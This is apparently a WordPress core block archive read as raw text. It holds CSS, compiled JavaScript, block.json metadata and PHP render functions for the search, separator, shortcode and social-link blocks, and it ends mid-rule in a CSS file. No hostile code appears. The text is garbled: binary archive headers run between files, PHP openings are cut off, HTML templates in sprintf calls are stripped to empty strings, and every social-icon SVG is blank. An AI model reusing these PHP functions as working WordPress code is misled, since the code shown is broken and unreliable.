.wp-block-search__input:focus{outline:none}:where(.wp-block-search__button-inside .wp-block-search__inside-wrapper) :where(.wp-block-search__button){padding:4px 8px}.wp-block-search.aligncenter .wp-block-search__inside-wrapper{margin:auto}.wp-block-search__button-behavior-expand .wp-block-search__inside-wrapper{min-width:0!important;transition-property:width}.wp-block-search__button-behavior-expand .wp-block-search__input{flex-basis:100%;transition-duration:.3s}.wp-block-search__button-behavior-expand.wp-block-search__searchfield-hidden,.wp-block-search__button-behavior-expand.wp-block-search__searchfield-hidden .wp-block-search__inside-wrapper{overflow:hidden}.wp-block-search__button-behavior-expand.wp-block-search__searchfield-hidden .wp-block-search__input{border-left-width:0!important;border-right-width:0!important;flex-basis:0;flex-grow:0;margin:0;min-width:0!important;padding-left:0!important;padding-right:0!important;width:0!important}.wp-block[data-align=right] .wp-block-search__button-behavior-expand .wp-block-search__inside-wrapper{float:left}PK6[esearch/theme.cssnu[.wp-block-search .wp-block-search__label{ font-weight:700; } .wp-block-search__button{ border:1px solid #ccc; padding:.375em .625em; }PK6[{e~~search/theme-rtl.min.cssnu[.wp-block-search .wp-block-search__label{font-weight:700}.wp-block-search__button{border:1px solid #ccc;padding:.375em .625em}PK6[66search/editor.cssnu[.wp-block[data-align=center] .wp-block-search .wp-block-search__inside-wrapper{ margin:auto; } .wp-block-search .wp-block-search__button{ align-items:center; border-radius:initial; display:flex; height:auto; justify-content:center; } .wp-block-search__components-button-group{ margin-top:10px; }PK6[CTTsearch/view.min.asset.phpnu[ array(), 'version' => 'ff76b5016de2df424c55'); PK6[N؉ search/view.jsnu["use strict"; (self["__WordPressPrivateInteractivityAPI__"] = self["__WordPressPrivateInteractivityAPI__"] || []).push([[222],{ /***/ 534: /***/ (function(__unused_webpack_module, __unused_webpack___webpack_exports__, __webpack_require__) { /* harmony import */ var _wordpress_interactivity__WEBPACK_IMPORTED_MODULE_0__ = __webpack_require__(754); /** * WordPress dependencies */ (0,_wordpress_interactivity__WEBPACK_IMPORTED_MODULE_0__/* .store */ .h)({ selectors: { core: { search: { ariaLabel: ({ context }) => { const { ariaLabelCollapsed, ariaLabelExpanded } = context.core.search; return context.core.search.isSearchInputVisible ? ariaLabelExpanded : ariaLabelCollapsed; }, ariaControls: ({ context }) => { return context.core.search.isSearchInputVisible ? null : context.core.search.inputId; }, type: ({ context }) => { return context.core.search.isSearchInputVisible ? 'submit' : 'button'; }, tabindex: ({ context }) => { return context.core.search.isSearchInputVisible ? '0' : '-1'; } } } }, actions: { core: { search: { openSearchInput: ({ context, event, ref }) => { if (!context.core.search.isSearchInputVisible) { event.preventDefault(); context.core.search.isSearchInputVisible = true; ref.parentElement.querySelector('input').focus(); } }, closeSearchInput: ({ context }) => { context.core.search.isSearchInputVisible = false; }, handleSearchKeydown: store => { const { actions, event, ref } = store; // If Escape close the menu. if (event?.key === 'Escape') { actions.core.search.closeSearchInput(store); ref.querySelector('button').focus(); } }, handleSearchFocusout: store => { const { actions, event, ref } = store; // If focus is outside search form, and in the document, close menu // event.target === The element losing focus // event.relatedTarget === The element receiving focus (if any) // When focusout is outside the document, // `window.document.activeElement` doesn't change. if (!ref.contains(event.relatedTarget) && event.target !== window.document.activeElement) { actions.core.search.closeSearchInput(store); } } } } } }); /***/ }) }, /******/ function(__webpack_require__) { // webpackRuntimeModules /******/ var __webpack_exec__ = function(moduleId) { return __webpack_require__(__webpack_require__.s = moduleId); } /******/ var __webpack_exports__ = (__webpack_exec__(534)); /******/ } ]);PK6[{e~~search/theme.min.cssnu[.wp-block-search .wp-block-search__label{font-weight:700}.wp-block-search__button{border:1px solid #ccc;padding:.375em .625em}PK6[y+^^search/style.min.cssnu[.wp-block-search__button{margin-left:10px;word-break:normal}.wp-block-search__button.has-icon{line-height:0}.wp-block-search__button svg{fill:currentColor;min-height:24px;min-width:24px;vertical-align:text-bottom}:where(.wp-block-search__button){border:1px solid #ccc;padding:6px 10px}.wp-block-search__inside-wrapper{display:flex;flex:auto;flex-wrap:nowrap;max-width:100%}.wp-block-search__label{width:100%}.wp-block-search__input{-webkit-appearance:initial;appearance:none;border:1px solid #949494;flex-grow:1;margin-left:0;margin-right:0;min-width:3rem;padding:8px;text-decoration:unset!important}.wp-block-search.wp-block-search__button-only .wp-block-search__button{flex-shrink:0;margin-left:0;max-width:calc(100% - 100px)}:where(.wp-block-search__button-inside .wp-block-search__inside-wrapper){border:1px solid #949494;box-sizing:border-box;padding:4px}:where(.wp-block-search__button-inside .wp-block-search__inside-wrapper) .wp-block-search__input{border:none;border-radius:0;padding:0 4px}:where(.wp-block-search__button-inside .wp-block-search__inside-wrapper) .wp-block-search__input:focus{outline:none}:where(.wp-block-search__button-inside .wp-block-search__inside-wrapper) :where(.wp-block-search__button){padding:4px 8px}.wp-block-search.aligncenter .wp-block-search__inside-wrapper{margin:auto}.wp-block-search__button-behavior-expand .wp-block-search__inside-wrapper{min-width:0!important;transition-property:width}.wp-block-search__button-behavior-expand .wp-block-search__input{flex-basis:100%;transition-duration:.3s}.wp-block-search__button-behavior-expand.wp-block-search__searchfield-hidden,.wp-block-search__button-behavior-expand.wp-block-search__searchfield-hidden .wp-block-search__inside-wrapper{overflow:hidden}.wp-block-search__button-behavior-expand.wp-block-search__searchfield-hidden .wp-block-search__input{border-left-width:0!important;border-right-width:0!important;flex-basis:0;flex-grow:0;margin:0;min-width:0!important;padding-left:0!important;padding-right:0!important;width:0!important}.wp-block[data-align=right] .wp-block-search__button-behavior-expand .wp-block-search__inside-wrapper{float:right}PK6[esearch/theme-rtl.cssnu[.wp-block-search .wp-block-search__label{ font-weight:700; } .wp-block-search__button{ border:1px solid #ccc; padding:.375em .625em; }PK6[66search/editor-rtl.cssnu[.wp-block[data-align=center] .wp-block-search .wp-block-search__inside-wrapper{ margin:auto; } .wp-block-search .wp-block-search__button{ align-items:center; border-radius:initial; display:flex; height:auto; justify-content:center; } .wp-block-search__components-button-group{ margin-top:10px; }PK6[ TTsearch/view.asset.phpnu[ array(), 'version' => 'bbd4958a430d8ba14c4c'); PK6[ܸ$search/editor-rtl.min.cssnu[.wp-block[data-align=center] .wp-block-search .wp-block-search__inside-wrapper{margin:auto}.wp-block-search .wp-block-search__button{align-items:center;border-radius:initial;display:flex;height:auto;justify-content:center}.wp-block-search__components-button-group{margin-top:10px}PK6[ aT!search/view.min.jsnu["use strict";(self.__WordPressPrivateInteractivityAPI__=self.__WordPressPrivateInteractivityAPI__||[]).push([[222],{534:function(e,t,c){(0,c(754).h)({selectors:{core:{search:{ariaLabel:({context:e})=>{const{ariaLabelCollapsed:t,ariaLabelExpanded:c}=e.core.search;return e.core.search.isSearchInputVisible?c:t},ariaControls:({context:e})=>e.core.search.isSearchInputVisible?null:e.core.search.inputId,type:({context:e})=>e.core.search.isSearchInputVisible?"submit":"button",tabindex:({context:e})=>e.core.search.isSearchInputVisible?"0":"-1"}}},actions:{core:{search:{openSearchInput:({context:e,event:t,ref:c})=>{e.core.search.isSearchInputVisible||(t.preventDefault(),e.core.search.isSearchInputVisible=!0,c.parentElement.querySelector("input").focus())},closeSearchInput:({context:e})=>{e.core.search.isSearchInputVisible=!1},handleSearchKeydown:e=>{const{actions:t,event:c,ref:r}=e;"Escape"===c?.key&&(t.core.search.closeSearchInput(e),r.querySelector("button").focus())},handleSearchFocusout:e=>{const{actions:t,event:c,ref:r}=e;r.contains(c.relatedTarget)||c.target===window.document.activeElement||t.core.search.closeSearchInput(e)}}}}})}},function(e){var t;t=534,e(e.s=t)}]);PK6[TC C search/style-rtl.cssnu[.wp-block-search__button{ margin-right:10px; word-break:normal; } .wp-block-search__button.has-icon{ line-height:0; } .wp-block-search__button svg{ fill:currentColor; min-height:24px; min-width:24px; vertical-align:text-bottom; } :where(.wp-block-search__button){ border:1px solid #ccc; padding:6px 10px; } .wp-block-search__inside-wrapper{ display:flex; flex:auto; flex-wrap:nowrap; max-width:100%; } .wp-block-search__label{ width:100%; } .wp-block-search__input{ -webkit-appearance:initial; appearance:none; border:1px solid #949494; flex-grow:1; margin-left:0; margin-right:0; min-width:3rem; padding:8px; text-decoration:unset !important; } .wp-block-search.wp-block-search__button-only .wp-block-search__button{ flex-shrink:0; margin-right:0; max-width:calc(100% - 100px); } :where(.wp-block-search__button-inside .wp-block-search__inside-wrapper){ border:1px solid #949494; box-sizing:border-box; padding:4px; } :where(.wp-block-search__button-inside .wp-block-search__inside-wrapper) .wp-block-search__input{ border:none; border-radius:0; padding:0 4px; } :where(.wp-block-search__button-inside .wp-block-search__inside-wrapper) .wp-block-search__input:focus{ outline:none; } :where(.wp-block-search__button-inside .wp-block-search__inside-wrapper) :where(.wp-block-search__button){ padding:4px 8px; } .wp-block-search.aligncenter .wp-block-search__inside-wrapper{ margin:auto; } .wp-block-search__button-behavior-expand .wp-block-search__inside-wrapper{ min-width:0 !important; transition-property:width; } .wp-block-search__button-behavior-expand .wp-block-search__input{ flex-basis:100%; transition-duration:.3s; } .wp-block-search__button-behavior-expand.wp-block-search__searchfield-hidden,.wp-block-search__button-behavior-expand.wp-block-search__searchfield-hidden .wp-block-search__inside-wrapper{ overflow:hidden; } .wp-block-search__button-behavior-expand.wp-block-search__searchfield-hidden .wp-block-search__input{ border-left-width:0 !important; border-right-width:0 !important; flex-basis:0; flex-grow:0; margin:0; min-width:0 !important; padding-left:0 !important; padding-right:0 !important; width:0 !important; } .wp-block[data-align=right] .wp-block-search__button-behavior-expand .wp-block-search__inside-wrapper{ float:left; }PK6[$bB B search/style.cssnu[.wp-block-search__button{ margin-left:10px; word-break:normal; } .wp-block-search__button.has-icon{ line-height:0; } .wp-block-search__button svg{ fill:currentColor; min-height:24px; min-width:24px; vertical-align:text-bottom; } :where(.wp-block-search__button){ border:1px solid #ccc; padding:6px 10px; } .wp-block-search__inside-wrapper{ display:flex; flex:auto; flex-wrap:nowrap; max-width:100%; } .wp-block-search__label{ width:100%; } .wp-block-search__input{ -webkit-appearance:initial; appearance:none; border:1px solid #949494; flex-grow:1; margin-left:0; margin-right:0; min-width:3rem; padding:8px; text-decoration:unset !important; } .wp-block-search.wp-block-search__button-only .wp-block-search__button{ flex-shrink:0; margin-left:0; max-width:calc(100% - 100px); } :where(.wp-block-search__button-inside .wp-block-search__inside-wrapper){ border:1px solid #949494; box-sizing:border-box; padding:4px; } :where(.wp-block-search__button-inside .wp-block-search__inside-wrapper) .wp-block-search__input{ border:none; border-radius:0; padding:0 4px; } :where(.wp-block-search__button-inside .wp-block-search__inside-wrapper) .wp-block-search__input:focus{ outline:none; } :where(.wp-block-search__button-inside .wp-block-search__inside-wrapper) :where(.wp-block-search__button){ padding:4px 8px; } .wp-block-search.aligncenter .wp-block-search__inside-wrapper{ margin:auto; } .wp-block-search__button-behavior-expand .wp-block-search__inside-wrapper{ min-width:0 !important; transition-property:width; } .wp-block-search__button-behavior-expand .wp-block-search__input{ flex-basis:100%; transition-duration:.3s; } .wp-block-search__button-behavior-expand.wp-block-search__searchfield-hidden,.wp-block-search__button-behavior-expand.wp-block-search__searchfield-hidden .wp-block-search__inside-wrapper{ overflow:hidden; } .wp-block-search__button-behavior-expand.wp-block-search__searchfield-hidden .wp-block-search__input{ border-left-width:0 !important; border-right-width:0 !important; flex-basis:0; flex-grow:0; margin:0; min-width:0 !important; padding-left:0 !important; padding-right:0 !important; width:0 !important; } .wp-block[data-align=right] .wp-block-search__button-behavior-expand .wp-block-search__inside-wrapper{ float:right; }PK6[젟99 search.phpnu[`. Support these by defaulting an undefined label and // buttonText to `__( 'Search' )`. $attributes = wp_parse_args( $attributes, array( 'label' => __( 'Search' ), 'buttonText' => __( 'Search' ), ) ); $input_id = 'wp-block-search__input-' . ++$instance_id; $classnames = classnames_for_block_core_search( $attributes ); $show_label = ( ! empty( $attributes['showLabel'] ) ) ? true : false; $use_icon_button = ( ! empty( $attributes['buttonUseIcon'] ) ) ? true : false; $show_input = ( ! empty( $attributes['buttonPosition'] ) && 'button-only' === $attributes['buttonPosition'] ) ? false : true; $show_button = ( ! empty( $attributes['buttonPosition'] ) && 'no-button' === $attributes['buttonPosition'] ) ? false : true; $label_markup = ''; $input_markup = ''; $button_markup = ''; $width_styles = ''; if ( $show_label ) { if ( ! empty( $attributes['label'] ) ) { $label_markup = sprintf( '', $input_id, $attributes['label'] ); } else { $label_markup = sprintf( '', $input_id, __( 'Search' ) ); } } if ( $show_input ) { $input_markup = sprintf( '', $input_id, esc_attr( get_search_query() ), esc_attr( $attributes['placeholder'] ) ); } if ( $show_button ) { $button_internal_markup = ''; $button_classes = ''; if ( ! $use_icon_button ) { if ( ! empty( $attributes['buttonText'] ) ) { $button_internal_markup = $attributes['buttonText']; } } else { $button_classes .= 'has-icon'; $button_internal_markup = ' '; } $button_markup = sprintf( '', $button_internal_markup ); } if ( ! empty( $attributes['width'] ) && ! empty( $attributes['widthUnit'] ) ) { if ( ! empty( $attributes['buttonPosition'] ) && 'button-only' !== $attributes['buttonPosition'] ) { $width_styles = ' style="width: ' . $attributes['width'] . $attributes['widthUnit'] . ';"'; } } $field_markup = sprintf( '
    %s
    ', $width_styles, $input_markup . $button_markup ); $wrapper_attributes = get_block_wrapper_attributes( array( 'class' => $classnames ) ); return sprintf( '
    %s
    ', esc_url( home_url( '/' ) ), $wrapper_attributes, $label_markup . $field_markup ); } /** * Registers the `core/search` block on the server. */ function register_block_core_search() { register_block_type_from_metadata( __DIR__ . '/search', array( 'render_callback' => 'render_block_core_search', ) ); } add_action( 'init', 'register_block_core_search' ); /** * Builds the correct top level classnames for the 'core/search' block. * * @param array $attributes The block attributes. * * @return string The classnames used in the block. */ function classnames_for_block_core_search( $attributes ) { $classnames = array(); if ( ! empty( $attributes['buttonPosition'] ) ) { if ( 'button-inside' === $attributes['buttonPosition'] ) { $classnames[] = 'wp-block-search__button-inside'; } if ( 'button-outside' === $attributes['buttonPosition'] ) { $classnames[] = 'wp-block-search__button-outside'; } if ( 'no-button' === $attributes['buttonPosition'] ) { $classnames[] = 'wp-block-search__no-button'; } if ( 'button-only' === $attributes['buttonPosition'] ) { $classnames[] = 'wp-block-search__button-only'; } } if ( isset( $attributes['buttonUseIcon'] ) ) { if ( ! empty( $attributes['buttonPosition'] ) && 'no-button' !== $attributes['buttonPosition'] ) { if ( $attributes['buttonUseIcon'] ) { $classnames[] = 'wp-block-search__icon-button'; } else { $classnames[] = 'wp-block-search__text-button'; } } } return implode( ' ', $classnames ); } PK6[IMCCseparator/block.jsonnu[{ "apiVersion": 2, "name": "core/separator", "category": "design", "attributes": { "color": { "type": "string" }, "customColor": { "type": "string" } }, "supports": { "anchor": true, "align": ["center","wide","full"] }, "editorStyle": "wp-block-separator-editor", "style": "wp-block-separator" } PK6[`separator/editor.min.cssnu[.block-editor-block-list__block[data-type="core/separator"]{padding-bottom:.1px;padding-top:.1px}.block-editor-block-list__block[data-type="core/separator"].wp-block-separator.is-style-dots{background:none!important;border:none}PK6[FR``separator/style-rtl.min.cssnu[@charset "UTF-8";.wp-block-separator{border:1px solid;border-left:none;border-right:none}.wp-block-separator.is-style-dots{background:none!important;border:none;height:auto;line-height:1;text-align:center}.wp-block-separator.is-style-dots:before{color:currentColor;content:"···";font-family:serif;font-size:1.5em;letter-spacing:2em;padding-left:2em}PK6[separator/theme.cssnu[.wp-block-separator.has-css-opacity{ opacity:.4; } .wp-block-separator{ border:none; border-bottom:2px solid; margin-left:auto; margin-right:auto; } .wp-block-separator.has-alpha-channel-opacity{ opacity:1; } .wp-block-separator:not(.is-style-wide):not(.is-style-dots){ width:100px; } .wp-block-separator.has-background:not(.is-style-dots){ border-bottom:none; height:1px; } .wp-block-separator.has-background:not(.is-style-wide):not(.is-style-dots){ height:2px; }PK6[ótseparator/theme-rtl.min.cssnu[.wp-block-separator.has-css-opacity{opacity:.4}.wp-block-separator{border:none;border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){border-bottom:none;height:1px}.wp-block-separator.has-background:not(.is-style-wide):not(.is-style-dots){height:2px}PK6[lseparator/editor.cssnu[.block-editor-block-list__block[data-type="core/separator"]{ padding-bottom:.1px; padding-top:.1px; } .block-editor-block-list__block[data-type="core/separator"].wp-block-separator.is-style-dots{ background:none !important; border:none; }PK6[ótseparator/theme.min.cssnu[.wp-block-separator.has-css-opacity{opacity:.4}.wp-block-separator{border:none;border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){border-bottom:none;height:1px}.wp-block-separator.has-background:not(.is-style-wide):not(.is-style-dots){height:2px}PK6[FR``separator/style.min.cssnu[@charset "UTF-8";.wp-block-separator{border:1px solid;border-left:none;border-right:none}.wp-block-separator.is-style-dots{background:none!important;border:none;height:auto;line-height:1;text-align:center}.wp-block-separator.is-style-dots:before{color:currentColor;content:"···";font-family:serif;font-size:1.5em;letter-spacing:2em;padding-left:2em}PK6[separator/theme-rtl.cssnu[.wp-block-separator.has-css-opacity{ opacity:.4; } .wp-block-separator{ border:none; border-bottom:2px solid; margin-left:auto; margin-right:auto; } .wp-block-separator.has-alpha-channel-opacity{ opacity:1; } .wp-block-separator:not(.is-style-wide):not(.is-style-dots){ width:100px; } .wp-block-separator.has-background:not(.is-style-dots){ border-bottom:none; height:1px; } .wp-block-separator.has-background:not(.is-style-wide):not(.is-style-dots){ height:2px; }PK6[lseparator/editor-rtl.cssnu[.block-editor-block-list__block[data-type="core/separator"]{ padding-bottom:.1px; padding-top:.1px; } .block-editor-block-list__block[data-type="core/separator"].wp-block-separator.is-style-dots{ background:none !important; border:none; }PK6[`separator/editor-rtl.min.cssnu[.block-editor-block-list__block[data-type="core/separator"]{padding-bottom:.1px;padding-top:.1px}.block-editor-block-list__block[data-type="core/separator"].wp-block-separator.is-style-dots{background:none!important;border:none}PK6[Bseparator/style-rtl.cssnu[@charset "UTF-8"; .wp-block-separator{ border:1px solid; border-left:none; border-right:none; } .wp-block-separator.is-style-dots{ background:none !important; border:none; height:auto; line-height:1; text-align:center; } .wp-block-separator.is-style-dots:before{ color:currentColor; content:"···"; font-family:serif; font-size:1.5em; letter-spacing:2em; padding-left:2em; }PK6[Bseparator/style.cssnu[@charset "UTF-8"; .wp-block-separator{ border:1px solid; border-left:none; border-right:none; } .wp-block-separator.is-style-dots{ background:none !important; border:none; height:auto; line-height:1; text-align:center; } .wp-block-separator.is-style-dots:before{ color:currentColor; content:"···"; font-family:serif; font-size:1.5em; letter-spacing:2em; padding-left:2em; }PK6[YQshortcode/block.jsonnu[{ "apiVersion": 2, "name": "core/shortcode", "category": "widgets", "attributes": { "text": { "type": "string", "source": "html" } }, "supports": { "className": false, "customClassName": false, "html": false }, "editorStyle": "wp-block-shortcode-editor" } PK6[)shortcode/editor.min.cssnu[[data-type="core/shortcode"].components-placeholder{min-height:0}.blocks-shortcode__textarea{background:#fff!important;border:1px solid #1e1e1e!important;border-radius:2px!important;box-shadow:none!important;box-sizing:border-box;color:#1e1e1e!important;font-family:Menlo,Consolas,monaco,monospace!important;font-size:16px!important;max-height:250px;padding:12px!important;resize:none}@media (min-width:600px){.blocks-shortcode__textarea{font-size:13px!important}}.blocks-shortcode__textarea:focus{border-color:var(--wp-admin-theme-color)!important;box-shadow:0 0 0 1px var(--wp-admin-theme-color)!important;outline:2px solid transparent!important}PK6[&"shortcode/editor.cssnu[[data-type="core/shortcode"].components-placeholder{ min-height:0; } .blocks-shortcode__textarea{ background:#fff !important; border:1px solid #1e1e1e !important; border-radius:2px !important; box-shadow:none !important; box-sizing:border-box; color:#1e1e1e !important; font-family:Menlo,Consolas,monaco,monospace !important; font-size:16px !important; max-height:250px; padding:12px !important; resize:none; } @media (min-width:600px){ .blocks-shortcode__textarea{ font-size:13px !important; } } .blocks-shortcode__textarea:focus{ border-color:var(--wp-admin-theme-color) !important; box-shadow:0 0 0 1px var(--wp-admin-theme-color) !important; outline:2px solid transparent !important; }PK6[&"shortcode/editor-rtl.cssnu[[data-type="core/shortcode"].components-placeholder{ min-height:0; } .blocks-shortcode__textarea{ background:#fff !important; border:1px solid #1e1e1e !important; border-radius:2px !important; box-shadow:none !important; box-sizing:border-box; color:#1e1e1e !important; font-family:Menlo,Consolas,monaco,monospace !important; font-size:16px !important; max-height:250px; padding:12px !important; resize:none; } @media (min-width:600px){ .blocks-shortcode__textarea{ font-size:13px !important; } } .blocks-shortcode__textarea:focus{ border-color:var(--wp-admin-theme-color) !important; box-shadow:0 0 0 1px var(--wp-admin-theme-color) !important; outline:2px solid transparent !important; }PK6[)shortcode/editor-rtl.min.cssnu[[data-type="core/shortcode"].components-placeholder{min-height:0}.blocks-shortcode__textarea{background:#fff!important;border:1px solid #1e1e1e!important;border-radius:2px!important;box-shadow:none!important;box-sizing:border-box;color:#1e1e1e!important;font-family:Menlo,Consolas,monaco,monospace!important;font-size:16px!important;max-height:250px;padding:12px!important;resize:none}@media (min-width:600px){.blocks-shortcode__textarea{font-size:13px!important}}.blocks-shortcode__textarea:focus{border-color:var(--wp-admin-theme-color)!important;box-shadow:0 0 0 1px var(--wp-admin-theme-color)!important;outline:2px solid transparent!important}PK6[q3 shortcode.phpnu[ 'render_block_core_shortcode', ) ); } add_action( 'init', 'register_block_core_shortcode' ); PK6[ social-link/block.jsonnu[{ "apiVersion": 2, "name": "core/social-link", "category": "widgets", "parent": [ "core/social-links" ], "attributes": { "url": { "type": "string" }, "service": { "type": "string" }, "label": { "type": "string" } }, "usesContext": [ "openInNewTab", "iconColorValue", "iconBackgroundColorValue" ], "supports": { "reusable": false, "html": false }, "editorStyle": "wp-block-social-link-editor" } PK6[aFuusocial-link/editor.min.cssnu[.wp-block-social-links .wp-social-link{line-height:0}.wp-block-social-links .wp-social-link button{color:currentColor;font-size:inherit;height:auto;line-height:0;opacity:1;padding:.25em}.wp-block-social-links.is-style-pill-shape .wp-social-link button{padding-left:.66667em;padding-right:.66667em}.wp-block-social-links.is-style-logos-only .wp-social-link button{padding:0}PK6[wsocial-link/editor.cssnu[.wp-block-social-links .wp-social-link{ line-height:0; } .wp-block-social-links .wp-social-link button{ color:currentColor; font-size:inherit; height:auto; line-height:0; opacity:1; padding:.25em; } .wp-block-social-links.is-style-pill-shape .wp-social-link button{ padding-left:.66667em; padding-right:.66667em; } .wp-block-social-links.is-style-logos-only .wp-social-link button{ padding:0; }PK6[wsocial-link/editor-rtl.cssnu[.wp-block-social-links .wp-social-link{ line-height:0; } .wp-block-social-links .wp-social-link button{ color:currentColor; font-size:inherit; height:auto; line-height:0; opacity:1; padding:.25em; } .wp-block-social-links.is-style-pill-shape .wp-social-link button{ padding-left:.66667em; padding-right:.66667em; } .wp-block-social-links.is-style-logos-only .wp-social-link button{ padding:0; }PK6[aFuusocial-link/editor-rtl.min.cssnu[.wp-block-social-links .wp-social-link{line-height:0}.wp-block-social-links .wp-social-link button{color:currentColor;font-size:inherit;height:auto;line-height:0;opacity:1;padding:.25em}.wp-block-social-links.is-style-pill-shape .wp-social-link button{padding-left:.66667em;padding-right:.66667em}.wp-block-social-links.is-style-logos-only .wp-social-link button{padding:0}PK6[@@social-link.phpnu[context['openInNewTab'] ) ? $block->context['openInNewTab'] : false; $service = ( isset( $attributes['service'] ) ) ? $attributes['service'] : 'Icon'; $url = ( isset( $attributes['url'] ) ) ? $attributes['url'] : false; $label = ( isset( $attributes['label'] ) ) ? $attributes['label'] : block_core_social_link_get_name( $service ); $class_name = isset( $attributes['className'] ) ? ' ' . $attributes['className'] : false; // Don't render a link if there is no URL set. if ( ! $url ) { return ''; } $attribute = ''; if ( $open_in_new_tab ) { $attribute = 'rel="noopener nofollow" target="_blank"'; } $icon = block_core_social_link_get_icon( $service ); $wrapper_attributes = get_block_wrapper_attributes( array( 'class' => 'wp-social-link wp-social-link-' . $service . $class_name, 'style' => block_core_social_link_get_color_styles( $block->context ), ) ); return '
  • ' . $icon . '
  • '; } /** * Registers the `core/social-link` blocks. */ function register_block_core_social_link() { register_block_type_from_metadata( __DIR__ . '/social-link', array( 'render_callback' => 'render_block_core_social_link', ) ); } add_action( 'init', 'register_block_core_social_link' ); /** * Returns the SVG for social link. * * @param string $service The service icon. * * @return string SVG Element for service icon. */ function block_core_social_link_get_icon( $service ) { $services = block_core_social_link_services(); if ( isset( $services[ $service ] ) && isset( $services[ $service ]['icon'] ) ) { return $services[ $service ]['icon']; } return $services['share']['icon']; } /** * Returns the brand name for social link. * * @param string $service The service icon. * * @return string Brand label. */ function block_core_social_link_get_name( $service ) { $services = block_core_social_link_services(); if ( isset( $services[ $service ] ) && isset( $services[ $service ]['name'] ) ) { return $services[ $service ]['name']; } return $services['share']['name']; } /** * Returns the SVG for social link. * * @param string $service The service slug to extract data from. * @param string $field The field ('name', 'icon', etc) to extract for a service. * * @return array|string */ function block_core_social_link_services( $service = '', $field = '' ) { $services_data = array( 'fivehundredpx' => array( 'name' => '500px', 'icon' => '', ), 'amazon' => array( 'name' => 'Amazon', 'icon' => '', ), 'bandcamp' => array( 'name' => 'Bandcamp', 'icon' => '', ), 'behance' => array( 'name' => 'Behance', 'icon' => '', ), 'chain' => array( 'name' => 'Link', 'icon' => '', ), 'codepen' => array( 'name' => 'CodePen', 'icon' => '', ), 'deviantart' => array( 'name' => 'DeviantArt', 'icon' => '', ), 'dribbble' => array( 'name' => 'Dribbble', 'icon' => '', ), 'dropbox' => array( 'name' => 'Dropbox', 'icon' => '', ), 'etsy' => array( 'name' => 'Etsy', 'icon' => '', ), 'facebook' => array( 'name' => 'Facebook', 'icon' => '', ), 'feed' => array( 'name' => 'RSS Feed', 'icon' => '', ), 'flickr' => array( 'name' => 'Flickr', 'icon' => '', ), 'foursquare' => array( 'name' => 'Foursquare', 'icon' => '', ), 'goodreads' => array( 'name' => 'Goodreads', 'icon' => '', ), 'google' => array( 'name' => 'Google', 'icon' => '', ), 'github' => array( 'name' => 'GitHub', 'icon' => '', ), 'instagram' => array( 'name' => 'Instagram', 'icon' => '', ), 'lastfm' => array( 'name' => 'Last.fm', 'icon' => '', ), 'linkedin' => array( 'name' => 'LinkedIn', 'icon' => '', ), 'mail' => array( 'name' => 'Mail', 'icon' => '', ), 'mastodon' => array( 'name' => 'Mastodon', 'icon' => '', ), 'meetup' => array( 'name' => 'Meetup', 'icon' => '', ), 'medium' => array( 'name' => 'Medium', 'icon' => '', ), 'patreon' => array( 'name' => 'Patreon', 'icon' => '', ), 'pinterest' => array( 'name' => 'Pinterest', 'icon' => '', ), 'pocket' => array( 'name' => 'Pocket', 'icon' => '', ), 'reddit' => array( 'name' => 'Reddit', 'icon' => '', ), 'skype' => array( 'name' => 'Skype', 'icon' => '', ), 'snapchat' => array( 'name' => 'Snapchat', 'icon' => '', ), 'soundcloud' => array( 'name' => 'Soundcloud', 'icon' => '', ), 'spotify' => array( 'name' => 'Spotify', 'icon' => '', ), 'telegram' => array( 'name' => 'Telegram', 'icon' => '', ), 'tiktok' => array( 'name' => 'TikTok', 'icon' => '', ), 'tumblr' => array( 'name' => 'Tumblr', 'icon' => '', ), 'twitch' => array( 'name' => 'Twitch', 'icon' => '', ), 'twitter' => array( 'name' => 'Twitter', 'icon' => '', ), 'vimeo' => array( 'name' => 'Vimeo', 'icon' => '', ), 'vk' => array( 'name' => 'VK', 'icon' => '', ), 'wordpress' => array( 'name' => 'WordPress', 'icon' => '', ), 'yelp' => array( 'name' => 'Yelp', 'icon' => '', ), 'youtube' => array( 'name' => 'YouTube', 'icon' => '', ), 'share' => array( 'name' => 'Share Icon', 'icon' => '', ), ); if ( ! empty( $service ) && ! empty( $field ) && isset( $services_data[ $service ] ) && ( 'icon' === $field || 'name' === $field ) ) { return $services_data[ $service ][ $field ]; } elseif ( ! empty( $service ) && isset( $services_data[ $service ] ) ) { return $services_data[ $service ]; } return $services_data; } /** * Returns CSS styles for icon and icon background colors. * * @param array $context Block context passed to Social Link. * * @return string Inline CSS styles for link's icon and background colors. */ function block_core_social_link_get_color_styles( $context ) { $styles = array(); if ( array_key_exists( 'iconColorValue', $context ) ) { $styles[] = 'color: ' . $context['iconColorValue'] . '; '; } if ( array_key_exists( 'iconBackgroundColorValue', $context ) ) { $styles[] = 'background-color: ' . $context['iconBackgroundColorValue'] . '; '; } return implode( '', $styles ); } PK6[:с>>social-links/block.jsonnu[{ "apiVersion": 2, "name": "core/social-links", "category": "widgets", "attributes": { "iconColor": { "type": "string" }, "customIconColor": { "type": "string" }, "iconColorValue": { "type": "string" }, "iconBackgroundColor": { "type": "string" }, "customIconBackgroundColor": { "type": "string" }, "iconBackgroundColorValue": { "type": "string" }, "openInNewTab": { "type": "boolean", "default": false }, "size": { "type": "string" } }, "providesContext": { "openInNewTab": "openInNewTab", "iconColorValue": "iconColorValue", "iconBackgroundColorValue": "iconBackgroundColorValue" }, "supports": { "align": [ "left", "center", "right" ], "anchor": true }, "editorStyle": "wp-block-social-links-editor", "style": "wp-block-social-links" } PK6[\Lsocial-links/editor.min.cssnu[.wp-block-social-links div.block-editor-url-input{display:inline-block;margin-left:8px}.wp-block-social-links.wp-block-social-links{background:none}.wp-social-link:hover{transform:none}.editor-styles-wrapper .wp-block-social-links{padding:0}.wp-block-social-links__social-placeholder{display:flex;list-style:none;opacity:.8}.wp-block-social-links__social-placeholder>.wp-social-link{margin-left:0!important;margin-right:0!important;padding-left:0!important;padding-right:0!important;visibility:hidden;width:0!important}.wp-block-social-links__social-placeholder>.wp-block-social-links__social-placeholder-icons{display:flex}.wp-block-social-links__social-placeholder .wp-social-link{padding:.25em}.is-style-pill-shape .wp-block-social-links__social-placeholder 